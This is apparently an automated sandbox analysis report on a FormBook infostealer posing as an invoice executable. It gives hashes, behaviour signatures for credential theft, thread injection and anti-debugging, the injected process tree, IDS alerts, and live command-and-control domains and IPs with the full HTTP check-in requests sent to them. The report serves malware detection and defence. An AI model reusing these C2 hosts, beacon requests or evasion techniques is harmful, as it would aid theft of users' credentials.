Windows Analysis Report
ORIGINAL INVOICE COAU7230734290.exe

Overview

General Information

Sample name: ORIGINAL INVOICE COAU7230734290.exe
Analysis ID: 1562307
MD5: faf30d977546a3527433829420a666c5
SHA1: 5258f4d7a4422007f249a28b67320d6b9e3d978d
SHA256: 2d9b62300c1248c233aa02fa4daa6d77efed6b8c617a8b33f4e9b71590941cda
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • ORIGINAL INVOICE COAU7230734290.exe (PID: 2732 cmdline: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe" MD5: FAF30D977546A3527433829420A666C5)
    • svchost.exe (PID: 6480 cmdline: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • tOxaspWNamv.exe (PID: 4608 cmdline: "C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • srdelayed.exe (PID: 4032 cmdline: "C:\Windows\SysWOW64\srdelayed.exe" MD5: B5F31FDCE1BE4171124B9749F9D2C600)
        • ktmutil.exe (PID: 2884 cmdline: "C:\Windows\SysWOW64\ktmutil.exe" MD5: AC387D5962B2FE2BF4D518DD57BA7230)
          • tOxaspWNamv.exe (PID: 3196 cmdline: "C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4048 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000E.00000002.3408793565.0000000000D80000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.2493193897.0000000002F90000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.2493863404.0000000005B50000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000B.00000002.3397246670.0000000002780000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.2492860834.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
4.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe", CommandLine: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe", CommandLine|base64offset|contains: N !, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe", ParentImage: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe, ParentProcessId: 2732, ParentProcessName: ORIGINAL INVOICE COAU7230734290.exe, ProcessCommandLine: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe", ProcessId: 6480, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe", CommandLine: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe", CommandLine|base64offset|contains: N !, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe", ParentImage: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe, ParentProcessId: 2732, ParentProcessName: ORIGINAL INVOICE COAU7230734290.exe, ProcessCommandLine: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe", ProcessId: 6480, ProcessName: svchost.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-25T13:45:03.450115+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49827 | 154.216.76.80 | 80 | TCP
2024-11-25T13:45:28.719654+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49890 | 3.33.130.190 | 80 | TCP
2024-11-25T13:45:43.659303+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49928 | 203.161.49.193 | 80 | TCP
2024-11-25T13:45:58.579118+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49964 | 3.33.130.190 | 80 | TCP
2024-11-25T13:46:13.971819+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50004 | 3.33.130.190 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-25T13:45:03.450115+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49827 | 154.216.76.80 | 80 | TCP
2024-11-25T13:45:28.719654+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49890 | 3.33.130.190 | 80 | TCP
2024-11-25T13:45:43.659303+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49928 | 203.161.49.193 | 80 | TCP
2024-11-25T13:45:58.579118+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49964 | 3.33.130.190 | 80 | TCP
2024-11-25T13:46:13.971819+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50004 | 3.33.130.190 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-25T13:45:20.641849+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49866 | 3.33.130.190 | 80 | TCP
2024-11-25T13:45:23.406485+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49874 | 3.33.130.190 | 80 | TCP
2024-11-25T13:45:26.016198+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49883 | 3.33.130.190 | 80 | TCP
2024-11-25T13:45:35.709825+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49906 | 203.161.49.193 | 80 | TCP
2024-11-25T13:45:38.417505+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49913 | 203.161.49.193 | 80 | TCP
2024-11-25T13:45:41.101249+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49919 | 203.161.49.193 | 80 | TCP
2024-11-25T13:45:50.648849+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49945 | 3.33.130.190 | 80 | TCP
2024-11-25T13:45:53.210916+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49952 | 3.33.130.190 | 80 | TCP
2024-11-25T13:45:55.867569+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49958 | 3.33.130.190 | 80 | TCP
2024-11-25T13:46:05.569306+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49980 | 3.33.130.190 | 80 | TCP
2024-11-25T13:46:08.305397+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49986 | 3.33.130.190 | 80 | TCP
2024-11-25T13:46:11.040675+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49994 | 3.33.130.190 | 80 | TCP
2024-11-25T13:46:22.569295+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50022 | 198.252.98.54 | 80 | TCP
2024-11-25T13:46:25.223693+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50028 | 198.252.98.54 | 80 | TCP
2024-11-25T13:46:27.927685+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50029 | 198.252.98.54 | 80 | TCP


AV Detection

Source: ORIGINAL INVOICE COAU7230734290.exe, ReversingLabs: Detection: 68%
Source: Yara match, File source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000E.00000002.3408793565.0000000000D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.2493193897.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.2493863404.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.3397246670.0000000002780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.2492860834.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.3409182554.0000000004790000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.3409416368.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.3409702511.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: ORIGINAL INVOICE COAU7230734290.exe, Joe Sandbox ML: detected
Source: ORIGINAL INVOICE COAU7230734290.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tOxaspWNamv.exe, 00000008.00000002.3405222238.0000000000F7E000.00000002.00000001.01000000.00000005.sdmp, tOxaspWNamv.exe, 0000000E.00000002.3409614358.0000000000F7E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: ORIGINAL INVOICE COAU7230734290.exe, 00000002.00000003.2165458850.00000000034B0000.00000004.00001000.00020000.00000000.sdmp, ORIGINAL INVOICE COAU7230734290.exe, 00000002.00000003.2163294510.0000000003600000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2493451391.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2391635779.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2493451391.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2389578275.0000000003600000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000003.2502109866.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000003.2504208467.0000000003028000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3412179263.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3412179263.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: srdelayed.pdbGCTL source: tOxaspWNamv.exe, 00000008.00000003.2433589740.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ORIGINAL INVOICE COAU7230734290.exe, 00000002.00000003.2165458850.00000000034B0000.00000004.00001000.00020000.00000000.sdmp, ORIGINAL INVOICE COAU7230734290.exe, 00000002.00000003.2163294510.0000000003600000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000002.2493451391.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2391635779.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2493451391.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2389578275.0000000003600000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 0000000B.00000003.2502109866.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000003.2504208467.0000000003028000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3412179263.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3412179263.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdbGCTL source: svchost.exe, 00000004.00000002.2493286869.0000000003412000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2493265316.0000000003400000.00000004.00000020.00020000.00000000.sdmp, tOxaspWNamv.exe, 00000008.00000003.2434247222.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdb source: svchost.exe, 00000004.00000002.2493286869.0000000003412000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2493265316.0000000003400000.00000004.00000020.00020000.00000000.sdmp, tOxaspWNamv.exe, 00000008.00000003.2434247222.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: srdelayed.pdb source: tOxaspWNamv.exe, 00000008.00000003.2433589740.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: ktmutil.exe, 0000000B.00000002.3402567248.0000000002D83000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3412669118.00000000037FC000.00000004.10000000.00040000.00000000.sdmp, tOxaspWNamv.exe, 0000000E.00000000.2571842961.000000000268C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2799096462.000000001763C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: ktmutil.exe, 0000000B.00000002.3402567248.0000000002D83000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3412669118.00000000037FC000.00000004.10000000.00040000.00000000.sdmp, tOxaspWNamv.exe, 0000000E.00000000.2571842961.000000000268C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2799096462.000000001763C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe, Code function: 2_2_00236CA9 GetFileAttributesW,FindFirstFileW,FindClose, 2_2_00236CA9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe, Code function: 2_2_002360DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 2_2_002360DD
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe, Code function: 2_2_002363F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 2_2_002363F9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe, Code function: 2_2_0023EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 2_2_0023EB60
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe, Code function: 2_2_0023F56F FindFirstFileW,FindClose, 2_2_0023F56F
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe, Code function: 2_2_0023F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 2_2_0023F5FA
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe, Code function: 2_2_00241B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_00241B2F
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe, Code function: 2_2_00241C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_00241C8A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe, Code function: 2_2_00241F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 2_2_00241F94
Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 11_2_0279C810 FindFirstFileW,FindNextFileW,FindClose, 11_2_0279C810
Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 4x nop then xor eax, eax, 11_2_02789F20
Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 4x nop then pop edi, 11_2_0278E50B
Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 4x nop then mov ebx, 00000004h, 11_2_02FC04DF

Networking

Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49827 -> 154.216.76.80:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49827 -> 154.216.76.80:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49890 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49890 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49874 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49866 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49919 -> 203.161.49.193:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49913 -> 203.161.49.193:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49928 -> 203.161.49.193:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49928 -> 203.161.49.193:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49883 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49945 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49952 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49958 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49964 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49964 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49980 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49986 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49994 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50004 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50004 -> 3.33.130.190:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49906 -> 203.161.49.193:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50022 -> 198.252.98.54:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50028 -> 198.252.98.54:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50029 -> 198.252.98.54:80
Source: DNS query: www.huiguang.xyz
Source: DNS query: www.schedulemassage.xyz
Source: Joe Sandbox View, IP Address: 203.161.49.193 203.161.49.193
Source: Joe Sandbox View, IP Address: 3.33.130.190 3.33.130.190
Source: Joe Sandbox View, ASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe, Code function: 2_2_00244EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 2_2_00244EB5
                Source: global trafficHTTP traffic detected: GET /hv6g/?Hx=ot9h&yX7=vSitAQgQO9xnWjtJgvvZZsk+23T/NzOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGBem8ABx5elB2IpCI9aOC0eTdsykMK9iQYMJsZcXRFR0PJFreT4Q= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.huiguang.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /79tr/?yX7=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZPygs+MxIMUNH2akCfN7/CzpsZyLj6qmJ1F1UuDNbdqvUipDEiTgU=&Hx=ot9h HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.beingandbecoming.ltdConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /hxmz/?Hx=ot9h&yX7=xeYt+TVrluKccowhuJaDBktUUZBiwtnijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H768cQaPGnwmWpoBoTXnujTk0fw5ooQYelqhpppqeWfG8SjK30Qts= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.futurevision.lifeConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /slxp/?yX7=QrWs1MGbYyQFoq3pAiasxQ0vJYE0z/vawTZeeI1i8tm8kxeN4mRaIZQqDmSre1AzN9sIeG+PxQ41EL+XqolOifcAo6/043Os1binCTsQtgQiE2XfHHikdfzfjKFZR+NqLzPU/Xw=&Hx=ot9h HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.schedulemassage.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /0598/?yX7=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4Tu+XiR6NXotGry9ANEeeRCoN4FhbxnBZSnIhm0SzK0MisIZlDjM=&Hx=ot9h HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mcfunding.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic, DNS traffic detected: DNS query: www.huiguang.xyz
Source: global traffic, DNS traffic detected: DNS query: www.beingandbecoming.ltd
Source: global traffic, DNS traffic detected: DNS query: www.futurevision.life
Source: global traffic, DNS traffic detected: DNS query: www.schedulemassage.xyz
Source: global traffic, DNS traffic detected: DNS query: www.mcfunding.org
Source: global traffic, DNS traffic detected: DNS query: www.migorengya8.click
